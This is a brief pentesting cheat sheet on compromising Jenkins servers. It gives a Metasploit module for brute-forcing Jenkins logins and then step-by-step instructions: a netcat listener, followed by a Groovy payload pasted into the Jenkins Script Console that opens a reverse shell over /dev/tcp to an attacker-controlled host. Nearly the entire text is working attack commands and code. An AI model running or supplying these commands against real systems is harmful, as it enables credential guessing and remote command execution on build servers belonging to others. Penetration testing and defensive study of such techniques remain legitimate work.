Jenkins Pentesting

Last modified: 2023-01-01

Reverse Shell Web

Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc.

Brute Force Credentials

msf > use auxiliary/scanner/http/jenkins_login

Reverse Shell on Dashboard

You need to have the credential.

  1. Opening Listener on Your Local Machine

    nc -lvnp 4444
  2. Login to Jenkins

    Access "http://localhost:8080" in browser and login.

  3. Click "Manage Jenkins" -> "Script Console"

  4. Add the Payload in the Console

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/<Attacker_IP>/4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
  5. Click "Run"

    Then you should get a shell.